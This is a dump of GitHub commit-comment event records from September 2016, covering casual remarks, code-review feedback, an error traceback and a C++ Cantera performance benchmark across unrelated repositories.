{"id":"4613609712","type":"CommitCommentEvent","actor":{"login":"sgreenley"},"repo":{"name":"sgreenley/hello-world"},"payload":{"comment":{"id":19162074,"position":null,"line":null,"path":null,"commit_id":"40e4177efde84acf3b9c2889ef07a50a49e05751","created_at":"2016-09-25T03:50:49Z","updated_at":"2016-09-25T03:50:49Z","body":"i think charlie is crazy"}},"created_at":"2016-09-25T03:50:49Z"}
{"id":"4613609936","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19162076,"position":79,"line":1512,"path":"src/main/java/net/pms/dlna/DLNAResource.java","commit_id":"fd892a4037c81bcf7cdf208a371cc3e64a37c798","created_at":"2016-09-25T03:51:05Z","updated_at":"2016-09-25T03:51:05Z","body":"@valib After you made ```subsAreValidForStreaming ``` local this if can never happen. The only way for it to be ```true``` is in the previous \"if\" and the this \"else if\" won't be called. I haven't studied how this works enough to fix it, but this block will never be used."}},"created_at":"2016-09-25T03:51:05Z"}
{"id":"4613610374","type":"CommitCommentEvent","actor":{"login":"BananaBot"},"repo":{"name":"evhsnewspaper-cougar-chronicles/evhsnewspaper-cougar-chronicles.github.io"},"payload":{"comment":{"id":19162080,"position":null,"line":null,"path":null,"commit_id":"100d6e5796185d7e9bc7bc06009e7743da6e9dd0","created_at":"2016-09-25T03:51:30Z","updated_at":"2016-09-25T03:51:30Z","body":"@bananabot1024 I tried making the navbar a different html file and import it where we needed it but I couldn't make it work :/"}},"created_at":"2016-09-25T03:51:30Z"}
{"id":"4613611065","type":"CommitCommentEvent","actor":{"login":"kdarbyshirebryant"},"repo":{"name":"tegularius/sch_cake"},"payload":{"comment":{"id":19162082,"position":null,"line":null,"path":null,"commit_id":"2f3c308faec499069959b4489e5a724a7d3b82f3","created_at":"2016-09-25T03:52:13Z","updated_at":"2016-09-25T03:52:13Z","body":"Not knowing any better I tried to test this.  My thought was that if your statement was true then the dst/src would be swapped with respect to a connection that originated within the lan vs a connection originated from wan and forwarded to a lan host.  I found that it made no difference...the src/dst addresses needed to be swapped with respect to packets that have the skb conntrack info set.  I need to spend more time to confirm this though."}},"created_at":"2016-09-25T03:52:13Z"}
{"id":"4613611708","type":"CommitCommentEvent","actor":{"login":"NoSpamDan"},"repo":{"name":"BrokenROM/device_oneplus_bacon"},"payload":{"comment":{"id":19162085,"position":null,"line":null,"path":null,"commit_id":"3bf7d883170939140c42fc653907f5332421a122","created_at":"2016-09-25T03:53:00Z","updated_at":"2016-09-25T03:53:00Z","body":"You win some... and ya lose some... LOL"}},"created_at":"2016-09-25T03:53:00Z"}
{"id":"4613612445","type":"CommitCommentEvent","actor":{"login":"caofengzi"},"repo":{"name":"XX-net/XX-Net"},"payload":{"comment":{"id":19162089,"position":null,"line":null,"path":null,"commit_id":"ae7fd8d252f941e6db575593381d3cd3c5288806","created_at":"2016-09-25T03:53:47Z","updated_at":"2016-09-25T03:53:47Z","body":"老大這麼長時間幹嘛去啦？相親去啦？哈哈"}},"created_at":"2016-09-25T03:53:47Z"}
{"id":"4613612501","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19162090,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-25T03:53:51Z","updated_at":"2016-09-25T03:53:51Z","body":"hi,all. when the iphone is start. did you see a dialog show this message \"hello,ingress\".\r\nif you see the dialog,it mean the XglyphIOS is work fine.\r\nif not,may some bug is there."}},"created_at":"2016-09-25T03:53:51Z"}
{"id":"4613613115","type":"CommitCommentEvent","actor":{"login":"printempw"},"repo":{"name":"printempw/blessing-skin-server"},"payload":{"comment":{"id":19162093,"position":null,"line":null,"path":null,"commit_id":"fd7d2136031118ccaab7727a361e96bca5ea8b5f","created_at":"2016-09-25T03:54:39Z","updated_at":"2016-09-25T03:54:39Z","body":"缓存头好麻烦啊"}},"created_at":"2016-09-25T03:54:39Z"}
{"id":"4613613902","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19162095,"position":null,"line":null,"path":null,"commit_id":"de0833ff97f267828e5cb8c61013d8d2a7049a26","created_at":"2016-09-25T03:55:25Z","updated_at":"2016-09-25T03:55:25Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-25T03:55:25Z"}
{"id":"4613613970","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19162096,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-25T03:55:29Z","updated_at":"2016-09-25T03:55:29Z","body":"here is the dialog code.\r\n\r\n> +UIAlertView *alert = [[UIAlertView alloc]\r\n +initWithTitle:@\"welcome\"\r\n +message:@\"hello,ingress\"\r\n +delegate:nil\r\n +cancelButtonTitle:@\"ok\"\r\n +otherButtonTitles:nil];\r\n +[alert show];\r\n +[alert release];"}},"created_at":"2016-09-25T03:55:29Z"}
{"id":"4613615827","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19162100,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-25T03:57:27Z","updated_at":"2016-09-25T03:57:27Z","body":"you can change the window show when the phone is start.\r\n> [mywindow setHidden:TRUE];\r\nchange the code to below:\r\n> [mywindow setHidden:FALSE];"}},"created_at":"2016-09-25T03:57:27Z"}
{"id":"4613620820","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ishantvivek/android_device_samsung_kyleprods"},"payload":{"comment":{"id":19162117,"position":null,"line":null,"path":null,"commit_id":"11531d664dd7632eb07f56ec61a242c10d3fa11c","created_at":"2016-09-25T04:02:14Z","updated_at":"2016-09-25T04:02:14Z","body":"yeah , i know about it. I had such issue too, like in ES File Explorer. I don't know how it's related. Will take a look later. "}},"created_at":"2016-09-25T04:02:14Z"}
{"id":"4613621491","type":"CommitCommentEvent","actor":{"login":"sgreenley"},"repo":{"name":"sgreenley/hello-world"},"payload":{"comment":{"id":19162120,"position":3,"line":3,"path":"README.md","commit_id":"9315ec24263a192c304d975bf63b6d327c44a3b8","created_at":"2016-09-25T04:02:57Z","updated_at":"2016-09-25T04:02:57Z","body":"I think charlie is crazy"}},"created_at":"2016-09-25T04:02:57Z"}
{"id":"4613621660","type":"CommitCommentEvent","actor":{"login":"gjhiggins"},"repo":{"name":"RDFLib/rdflib-sqlalchemy"},"payload":{"comment":{"id":19162121,"position":null,"line":null,"path":null,"commit_id":"a693ed6b666df06ef40dead9b8e944b85b27585f","created_at":"2016-09-25T04:03:04Z","updated_at":"2016-09-25T04:03:04Z","body":"Nice to see someone getting some mileage out of this store."}},"created_at":"2016-09-25T04:03:04Z"}
{"id":"4613622715","type":"CommitCommentEvent","actor":{"login":"lee-won"},"repo":{"name":"lee-won/study.cn"},"payload":{"comment":{"id":19162124,"position":3,"line":3,"path":"test.txt","commit_id":"4daf103663f83e7bf0e8ac35158ce4ada68362bd","created_at":"2016-09-25T04:03:44Z","updated_at":"2016-09-25T04:03:44Z","body":"我在线上修改了"}},"created_at":"2016-09-25T04:03:44Z"}
{"id":"4613624930","type":"CommitCommentEvent","actor":{"login":"huskerman34"},"repo":{"name":"huskerman34/cs-pacific-trails"},"payload":{"comment":{"id":19162131,"position":null,"line":null,"path":null,"commit_id":"e6a079575a7265b70ba0cb2bd0e2ab742c4e8b23","created_at":"2016-09-25T04:05:27Z","updated_at":"2016-09-25T04:05:27Z","body":"This must be in a different directory. Trying to fix "}},"created_at":"2016-09-25T04:05:27Z"}
{"id":"4613625049","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19162132,"position":null,"line":null,"path":null,"commit_id":"8f334d3ba66b87dd670752f850f4d14844b946cf","created_at":"2016-09-25T04:05:35Z","updated_at":"2016-09-25T04:05:35Z","body":"I changed the values and now getting following error:\r\n\r\n`09/25/2016 04:04:15 AM ERROR: Error loading information from facebook for Goodwill Classes\r\nTraceback (most recent call last):\r\n  File \"geocodertest.py\", line 275, in _repairFromGraph\r\n    if not row['Street Address'] and 'street' in node['location']:\r\nKeyError: 'location'\r\n09/25/2016 04:04:22 AM ERROR: Error loading information from facebook for V.S. Saxena\r\nTraceback (most recent call last):\r\n  File \"geocodertest.py\", line 255, in _repairFromGraph\r\n    if row['City'].lower() == place['location']['city'].lower():\r\nKeyError: 'location'`\r\n\r\nDid you try running code before commiting it?"}},"created_at":"2016-09-25T04:05:35Z"}
{"id":"4613628229","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19162147,"position":5,"line":52,"path":"geocodertest.py","commit_id":"0a95f6d0cd94952833ebbc7345a4b018008083d4","created_at":"2016-09-25T04:08:43Z","updated_at":"2016-09-25T04:08:43Z","body":"Never hardcode values. If you want to run it for a selected set, manually remove the files from input folder rather than changing code."}},"created_at":"2016-09-25T04:08:43Z"}
{"id":"4613631577","type":"CommitCommentEvent","actor":{"login":"b526242561"},"repo":{"name":"b526242561/HTML5-Label-compatibility"},"payload":{"comment":{"id":19162159,"position":null,"line":null,"path":null,"commit_id":"002007cc1f3f2fa7e71025e3b9a077a7784fded6","created_at":"2016-09-25T04:12:18Z","updated_at":"2016-09-25T04:12:18Z","body":"谷歌兼容html5标签文档\r\n"}},"created_at":"2016-09-25T04:12:18Z"}
{"id":"4613631780","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19162160,"position":null,"line":null,"path":null,"commit_id":"8f334d3ba66b87dd670752f850f4d14844b946cf","created_at":"2016-09-25T04:12:30Z","updated_at":"2016-09-25T04:12:30Z","body":"I ran latest code on server and any of the 3 new fields created in this commit doesn't have any values."}},"created_at":"2016-09-25T04:12:30Z"}
{"id":"4613636916","type":"CommitCommentEvent","actor":{"login":"speth"},"repo":{"name":"haowu80s/cantera"},"payload":{"comment":{"id":19162175,"position":null,"line":null,"path":null,"commit_id":"c8d4163c150453ecdf7439ed1f669987063e9aa2","created_at":"2016-09-25T04:17:46Z","updated_at":"2016-09-25T04:17:46Z","body":"Hi, I noticed the work going on in this branch, and I think there is a simpler approach to implementing reaction elimination adaptive chemistry using capabilities already present in Cantera, which is simply to create a new `GasKinetics` object and just add the reactions that you want to keep. This turns out to be faster than the approach that you've implemented here, in part I suspect because it avoid the massive amount of branching that is required in this approach. Here is the code that I wrote to compare the two approaches:\r\n```cpp\r\n#include \"cantera/kinetics/AdaptiveGasKinetics.h\"\r\n#include \"cantera/thermo/IdealGasPhase.h\"\r\n#include \"cantera/kinetics/importKinetics.h\"\r\n\r\nusing namespace Cantera;\r\n\r\nint main(int argc, char** argv) {\r\n    IdealGasPhase gas(\"gri30.xml\", \"gri30\");\r\n    std::vector<ThermoPhase*> th {&gas};\r\n\r\n    std::shared_ptr<AdaptiveGasKinetics> adap = std::make_shared<AdaptiveGasKinetics>(&gas);\r\n    importKinetics(gas.xml(), th, adap.get());\r\n\r\n    std::shared_ptr<GasKinetics> kin = std::make_shared<GasKinetics>(&gas);\r\n    std::shared_ptr<GasKinetics> kin2 = std::make_shared<GasKinetics>(&gas);\r\n    importKinetics(gas.xml(), th, kin.get());\r\n\r\n    vector_fp X(gas.nSpecies(), 0.0);\r\n    gas.setState_TPX(300, 101325, \"CH4:1.0, O2:0.5, N2:3.76\");\r\n    gas.equilibrate(\"HP\");\r\n    gas.getMoleFractions(X.data());\r\n    gas.setState_TP(gas.temperature() + 100, gas.pressure());\r\n\r\n    for (size_t i = 0; i < adap->nReactions(); i++) {\r\n        if (i % 3 != 0 && i % 5 != 0) {\r\n            kin2->addReaction(kin->reaction(i));\r\n        } else {\r\n            kin->setMultiplier(i, 0.0);\r\n            adap->setActiveReaction(i, false);\r\n        }\r\n    }\r\n\r\n    vector_fp ropnet(gas.nSpecies());\r\n\r\n    size_t kN2 = gas.speciesIndex(\"N2\");\r\n    size_t N = 1000000;\r\n\r\n    if (argc == 1 || std::string(argv[1]) == \"1\") {\r\n        writelog(\"Running with full reaction mechanism\\n\");\r\n        for (size_t i = 0; i < N; i++) {\r\n            double T = 900 + 0.001 * N;\r\n            X[kN2] = 0.4 + 0.1 * ((double) i) / ((double) N);\r\n            gas.setState_TPX(T, 2*OneAtm, X.data());\r\n            kin->getNetProductionRates(ropnet.data());\r\n        }\r\n\r\n    } else if (std::string(argv[1]) == \"2\") {\r\n        writelog(\"Running with new GasKinetics object\\n\");\r\n        for (size_t i = 0; i < N; i++) {\r\n            if (i % 2000 == 0) {\r\n                kin2.reset(new GasKinetics(&gas));\r\n                for (size_t n = 0; n < kin->nReactions(); n++) {\r\n                    if (n % 3 != 0 && n % 5 != 0) {\r\n                        kin2->addReaction(kin->reaction(n));\r\n                    }\r\n                }\r\n            }\r\n            double T = 900 + 0.001 * N;\r\n            X[kN2] = 0.4 + 0.1 * ((double) i) / ((double) N);\r\n            gas.setState_TPX(T, 2*OneAtm, X.data());\r\n            kin2->getNetProductionRates(ropnet.data());\r\n        }\r\n\r\n    } else if (std::string(argv[1]) == \"3\") {\r\n        writelog(\"Running with AdaptiveGasKinetics\\n\");\r\n        for (size_t i = 0; i < N; i++) {\r\n            double T = 900 + 0.001 * N;\r\n            X[kN2] = 0.4 + 0.1 * ((double) i) / ((double) N);\r\n            gas.setState_TPX(T, 2*OneAtm, X.data());\r\n            adap->getNetProductionRates(ropnet.data());\r\n        }\r\n\r\n    } else {\r\n        writelog(\"Invalid command line option\");\r\n        return 1;\r\n    }\r\n\r\n    return 0;\r\n}\r\n\r\n```\r\nRunning this code with the command line options `1`, `2`, or `3` will run the full mechanism, a reduced mechanism formed by periodically creating a new `GasKinetics` object, and your `AdaptiveGasKinetics` class, respectively. The purpose of recreating the reduced `GasKinetics` object is an attempt to simulate the occasional modification of the set of reactions retained. If this happens very frequently, then the `AdaptiveGasKinetics` class could be faster, but I assume that it should be fairly common to keep the same reduced set of reactions around for a while (if nothing else, you could simply keep track of reactions to be eliminated, and only replace the mechanism once you had enough candidate reactions for it to be worth recreating the object). For reference, the timings I get for these three cases on my machine are approximately 5.0, 3.2, and 3.9 seconds.\r\n"}},"created_at":"2016-09-25T04:17:46Z"}
{"id":"4613637627","type":"CommitCommentEvent","actor":{"login":"ZhongZongkun"},"repo":{"name":"ZhongZongkun/CountTime"},"payload":{"comment":{"id":19162178,"position":null,"line":null,"path":null,"commit_id":"b9eb899ce0cb3fd1d9612ce7b4eebe1ef55af27a","created_at":"2016-09-25T04:18:24Z","updated_at":"2016-09-25T04:18:24Z","body":"nice day"}},"created_at":"2016-09-25T04:18:24Z"}
{"id":"4613641398","type":"CommitCommentEvent","actor":{"login":"bitinn"},"repo":{"name":"bitinn/node-fetch"},"payload":{"comment":{"id":19162194,"position":1,"line":1,"path":"test/server.js","commit_id":"e926483448c675b7443d2c085c49cee9d4619120","created_at":"2016-09-25T04:22:30Z","updated_at":"2016-09-25T04:22:30Z","body":"Out of habit really, I am used to doing this: https://github.com/bitinn/node-fetch/blob/master/index.js#L1-L7"}},"created_at":"2016-09-25T04:22:30Z"}
{"id":"4613643645","type":"CommitCommentEvent","actor":{"login":"apandada1"},"repo":{"name":"vadrian89/cumulus"},"payload":{"comment":{"id":19162200,"position":null,"line":null,"path":null,"commit_id":"90feb23cd9b4c4da8a9ab848da0bf79cbd6c9e4f","created_at":"2016-09-25T04:25:01Z","updated_at":"2016-09-25T04:25:01Z","body":"This is working fine. All those previous bugs seem to be fixed. :+1: "}},"created_at":"2016-09-25T04:25:01Z"}
{"id":"4613643912","type":"CommitCommentEvent","actor":{"login":"davecheney"},"repo":{"name":"davecheney/httpstat"},"payload":{"comment":{"id":19162203,"position":null,"line":null,"path":null,"commit_id":"4f975b2a27896373cfe867cca4ddc532ae615448","created_at":"2016-09-25T04:25:18Z","updated_at":"2016-09-25T04:25:18Z","body":"If your name was on the TODO hall of fame, don't worry. I want to give all the contributors a shout out on the release notes when we do the 1.0 release next sunday."}},"created_at":"2016-09-25T04:25:18Z"}
{"id":"4613644013","type":"CommitCommentEvent","actor":{"login":"jesilz"},"repo":{"name":"biola/blogs"},"payload":{"comment":{"id":19162204,"position":8,"line":30,"path":"app/views/articles/_article_list.html.slim","commit_id":"ba4b3409bcd2fcb95a1b5de057e6a0883ac0d8a5","created_at":"2016-09-25T04:25:25Z","updated_at":"2016-09-25T04:25:25Z","body":"@timbeardshear This is what you were looking for BUT if the article body includes an img tag in the first 150 characters it's going to show that in place of the teaser. This will need some fine tuning."}},"created_at":"2016-09-25T04:25:25Z"}
{"id":"4613644217","type":"CommitCommentEvent","actor":{"login":"Tagaro"},"repo":{"name":"Tagaro/Hello-World"},"payload":{"comment":{"id":19162206,"position":3,"line":3,"path":"README.md","commit_id":"c16b0ca7ff6792673fd111fdf79e781c27486f58","created_at":"2016-09-25T04:25:38Z","updated_at":"2016-09-25T04:25:38Z","body":"I'm starting a new project."}},"created_at":"2016-09-25T04:25:38Z"}
{"id":"4613645067","type":"CommitCommentEvent","actor":{"login":"jesilz"},"repo":{"name":"biola/blogs"},"payload":{"comment":{"id":19162214,"position":8,"line":30,"path":"app/views/articles/_article_list.html.slim","commit_id":"ba4b3409bcd2fcb95a1b5de057e6a0883ac0d8a5","created_at":"2016-09-25T04:26:36Z","updated_at":"2016-09-25T04:26:36Z","body":"@timbeardshear  same goes for header tags. you may want to strip certain tags out before truncating...? or really just use the teaser?"}},"created_at":"2016-09-25T04:26:36Z"}
{"id":"4613647601","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19162219,"position":null,"line":null,"path":null,"commit_id":"6bfe9d01098cd70dbe9239d721b036f85dea2638","created_at":"2016-09-25T04:29:30Z","updated_at":"2016-09-25T04:29:30Z","body":"It strikes me that this _might_ mean we can eliminate some surface copies made using make_neutral_surface."}},"created_at":"2016-09-25T04:29:30Z"}
{"id":"4613648539","type":"CommitCommentEvent","actor":{"login":"cnlinxi"},"repo":{"name":"cnlinxi/WebApiSample_uwp"},"payload":{"comment":{"id":19162220,"position":3,"line":3,"path":"README.md","commit_id":"48de817d3384448d465054c77c0543e4580bdeb8","created_at":"2016-09-25T04:30:26Z","updated_at":"2016-09-25T04:30:26Z","body":"本软件遵守Apache协议。"}},"created_at":"2016-09-25T04:30:26Z"}
{"id":"4613649138","type":"CommitCommentEvent","actor":{"login":"dursuncimen"},"repo":{"name":"gurhann/radyodinlenir"},"payload":{"comment":{"id":19162221,"position":null,"line":null,"path":null,"commit_id":"beef90a32aeb1456559a7de700e75f799709bb1f","created_at":"2016-09-25T04:31:03Z","updated_at":"2016-09-25T04:31:03Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Radyo player sisteme dahil edilecek](https://trello.com/c/PlYgJcr2/27-radyo-player-sisteme-dahil-edilecek)"}},"created_at":"2016-09-25T04:31:03Z"}
{"id":"4613649226","type":"CommitCommentEvent","actor":{"login":"dursuncimen"},"repo":{"name":"gurhann/radyodinlenir"},"payload":{"comment":{"id":19162222,"position":null,"line":null,"path":null,"commit_id":"c8521f4fc37475e1acd2416aa7629e3e93d5ba8c","created_at":"2016-09-25T04:31:08Z","updated_at":"2016-09-25T04:31:08Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Radyo player sisteme dahil edilecek](https://trello.com/c/PlYgJcr2/27-radyo-player-sisteme-dahil-edilecek)"}},"created_at":"2016-09-25T04:31:08Z"}
{"id":"4613649276","type":"CommitCommentEvent","actor":{"login":"cnlinxi"},"repo":{"name":"cnlinxi/WebApiSample_uwp"},"payload":{"comment":{"id":19162223,"position":3,"line":3,"path":"README.md","commit_id":"48de817d3384448d465054c77c0543e4580bdeb8","created_at":"2016-09-25T04:31:12Z","updated_at":"2016-09-25T04:31:12Z","body":"本软件遵守Apache协议。"}},"created_at":"2016-09-25T04:31:12Z"}
{"id":"4613650924","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19162224,"position":null,"line":null,"path":null,"commit_id":"16c1b86443214340faf6f45702bac164b8cdaa34","created_at":"2016-09-25T04:33:04Z","updated_at":"2016-09-25T04:33:04Z","body":"I was thinking for addon tracks, particularly already-existing ones where people might not be bothered to update the WML. (Then again, they might not have bothered with metdata either...)"}},"created_at":"2016-09-25T04:33:04Z"}
{"id":"4613655229","type":"CommitCommentEvent","actor":{"login":"joeparis"},"repo":{"name":"joeparis/CIS196-CS233J-Fall-16"},"payload":{"comment":{"id":19162234,"position":null,"line":null,"path":null,"commit_id":"ab57191f405ab155c143a8475eb6b3db54828324","created_at":"2016-09-25T04:38:06Z","updated_at":"2016-09-25T04:38:06Z","body":"Fixed minor formatting issue."}},"created_at":"2016-09-25T04:38:06Z"}
{"id":"4613658423","type":"CommitCommentEvent","actor":{"login":"dayyad"},"repo":{"name":"dayyad/Scara"},"payload":{"comment":{"id":19162239,"position":null,"line":null,"path":null,"commit_id":"d805ac9d5638c01cad91a2a850bf900ef89aa404","created_at":"2016-09-25T04:41:47Z","updated_at":"2016-09-25T04:41:47Z","body":"ka pai!"}},"created_at":"2016-09-25T04:41:47Z"}
{"id":"4613658861","type":"CommitCommentEvent","actor":{"login":"RobDolin"},"repo":{"name":"bahoo/progressive-events"},"payload":{"comment":{"id":19162241,"position":null,"line":null,"path":null,"commit_id":"f069dde1029f3058274e085e91d8337c93eea1fa","created_at":"2016-09-25T04:42:16Z","updated_at":"2016-09-25T04:42:16Z","body":"Great commit title ;)"}},"created_at":"2016-09-25T04:42:16Z"}
{"id":"4613659068","type":"CommitCommentEvent","actor":{"login":"beanstown106"},"repo":{"name":"PureNexusProject/android_frameworks_base"},"payload":{"comment":{"id":19162244,"position":null,"line":null,"path":null,"commit_id":"bd2170f926047fad148dfd7be8214cdc59f66249","created_at":"2016-09-25T04:42:34Z","updated_at":"2016-09-25T04:42:34Z","body":"Ya I think even hardcoding 6 wouldn't be bad should probably test on a few devices with some varietys of dpi to make sure though lol,   thanks"}},"created_at":"2016-09-25T04:42:34Z"}
{"id":"4613660486","type":"CommitCommentEvent","actor":{"login":"xPaw"},"repo":{"name":"thelounge/lounge"},"payload":{"comment":{"id":19162246,"position":null,"line":null,"path":null,"commit_id":"213384ded988ef5327960e17d45342eb710d3373","created_at":"2016-09-25T04:44:16Z","updated_at":"2016-09-25T04:44:16Z","body":"![](https://cloud.githubusercontent.com/assets/613331/18813092/d38778be-82f3-11e6-8717-145fc3319b48.gif)\r\n"}},"created_at":"2016-09-25T04:44:16Z"}
{"id":"4613662542","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162249,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T04:46:29Z","updated_at":"2016-09-25T04:46:29Z","body":"是啊，又改了加密方式，求大神更新"}},"created_at":"2016-09-25T04:46:29Z"}
{"id":"4613662907","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"google-aosp/android_frameworks_av"},"payload":{"comment":{"id":19162250,"position":null,"line":null,"path":null,"commit_id":"d8d4994ad2e9bfcb39982e55b177b3f9424fcffc","created_at":"2016-09-25T04:46:49Z","updated_at":"2016-09-25T04:46:49Z","body":"Will cm-13.0 AV patches fully work on AOSP 6.0 when I would track AV and it's dependencies from cm-13.0 and revert these 3 commits on frameworks/av like you did for AOSP 7.0?"}},"created_at":"2016-09-25T04:46:49Z"}
{"id":"4613665306","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162253,"position":10,"line":10,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T04:49:17Z","updated_at":"2016-09-25T04:49:17Z","body":"Have you considered queensStack as a name?"}},"created_at":"2016-09-25T04:49:17Z"}
{"id":"4613665441","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162254,"position":8,"line":8,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T04:49:25Z","updated_at":"2016-09-25T04:49:25Z","body":"..."}},"created_at":"2016-09-25T04:49:25Z"}
{"id":"4613666929","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162256,"position":18,"line":18,"path":"Unit One/src/com/bayviewglen/queens/Queen.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T04:50:32Z","updated_at":"2016-09-25T04:50:32Z","body":"So there's a getColumn method but no getRow method?"}},"created_at":"2016-09-25T04:50:32Z"}
{"id":"4613667577","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162259,"position":5,"line":5,"path":"Unit One/src/com/bayviewglen/queens/QueensInterface.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T04:51:02Z","updated_at":"2016-09-25T04:51:02Z","body":"FAKE INTERFACE!!!"}},"created_at":"2016-09-25T04:51:02Z"}
{"id":"4613668598","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162261,"position":57,"line":57,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T04:51:54Z","updated_at":"2016-09-25T04:51:54Z","body":"lol"}},"created_at":"2016-09-25T04:51:54Z"}
{"id":"4613670720","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162264,"position":37,"line":37,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T04:53:54Z","updated_at":"2016-09-25T04:53:54Z","body":"You do realize that every problem except for 2 and 3 have a solution... and since the run time of those is essentially 0, this code doesn't really save time..."}},"created_at":"2016-09-25T04:53:54Z"}
{"id":"4613671334","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162266,"position":15,"line":15,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T04:54:27Z","updated_at":"2016-09-25T04:54:27Z","body":"sigh..."}},"created_at":"2016-09-25T04:54:27Z"}
{"id":"4613671724","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162267,"position":18,"line":18,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T04:54:47Z","updated_at":"2016-09-25T04:54:47Z","body":"You do realize that boolean's default value is false..."}},"created_at":"2016-09-25T04:54:47Z"}
{"id":"4613672168","type":"CommitCommentEvent","actor":{"login":"alanorth"},"repo":{"name":"ilri/rmg-ansible-public"},"payload":{"comment":{"id":19162269,"position":null,"line":null,"path":null,"commit_id":"46e0d070f2edaa24dbb0df36b9cd48f5031b1ab5","created_at":"2016-09-25T04:55:09Z","updated_at":"2016-09-25T04:55:09Z","body":"`systemd-timesyncd` comes with systemd 216, but apparently [Red Hat disables it in their build of 219](https://www.centos.org/forums/viewtopic.php?t=54021)."}},"created_at":"2016-09-25T04:55:09Z"}
{"id":"4613675001","type":"CommitCommentEvent","actor":{"login":"astorije"},"repo":{"name":"thelounge/lounge"},"payload":{"comment":{"id":19162276,"position":null,"line":null,"path":null,"commit_id":"213384ded988ef5327960e17d45342eb710d3373","created_at":"2016-09-25T04:57:38Z","updated_at":"2016-09-25T04:57:38Z","body":"![image](https://cloud.githubusercontent.com/assets/113730/18813131/08ca6560-82bb-11e6-9b33-a4cd174eadcf.png)\r\n"}},"created_at":"2016-09-25T04:57:38Z"}
{"id":"4613675279","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162277,"position":44,"line":44,"path":"Unit One/src/com/bayviewglen/queens/QueensInterface.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T04:57:53Z","updated_at":"2016-09-25T04:57:53Z","body":"Whole numbers are greater than 0, not greater than 1. "}},"created_at":"2016-09-25T04:57:53Z"}
